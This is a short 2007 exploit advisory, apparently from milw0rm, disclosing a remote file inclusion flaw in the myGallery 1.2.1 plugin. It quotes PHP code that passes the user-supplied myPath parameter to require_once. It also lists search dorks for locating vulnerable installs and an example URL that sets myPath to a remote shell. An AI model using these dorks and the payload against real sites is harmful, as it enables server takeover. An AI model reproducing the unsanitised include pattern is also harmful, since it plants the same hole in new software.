myGallery 1.2.1(myPath)Remote File Include Vulnerablity

2007-04-30T00:00:00
ID SECURITYVULNS:DOC:16887
Type securityvulns
Reporter Securityvulns
Modified 2007-04-30T00:00:00

Description

AAAAAAAAA AAAAAAAA AAA AAA AAA AAAAAAAA
AAAAAAAAA AAAAAAAAA AAA AAA AAAAA AAAAAAAAAA
AAA AAA AAA AAA AAA AAAAAAA AAA
AAA AAAAAAAAA AAAAA AAA AAA AAA AAAAA AAA AAAAAAAA AAA AAA AAA AAA AAAAA AAA AAA AAA AAA AAAAAAAAA AAA AAA
AAA AAA AAA AAA AAA AAA AAAAAAAAAA
AAA AAA AAA AAA AAA AAA AAAAAAAA

myGallery 1.2.1(myPath)Remote File Include Vulnerablity

Script Paeg : http://www.wildbits.de/usr_files/mygallery_1.2.1.zip

Discovered by: GolD_M = [Mahmood_ali]

Homepage: http://www.Tryag.cc

V.Code

if (!$_POST){

$mypath=$_GET['myPath']; <---------[+]

}

else {

$mypath=$_POST['myPath'];<---------[+]

}

require_once($mypath.'/wp-config.php');<---------[+]

Dork :

inurl:/mygallery/myfunctions/ (OR) Index of /mygallery/myfunctions (OR) inurl:mygallerytmpl.php

Ex:

[Path_myGallery]/mygallery/myfunctions/mygallerybrowser.php?myPath=Shell

Sp.Thanx = Tryag-Team

milw0rm.com [2007-04-29]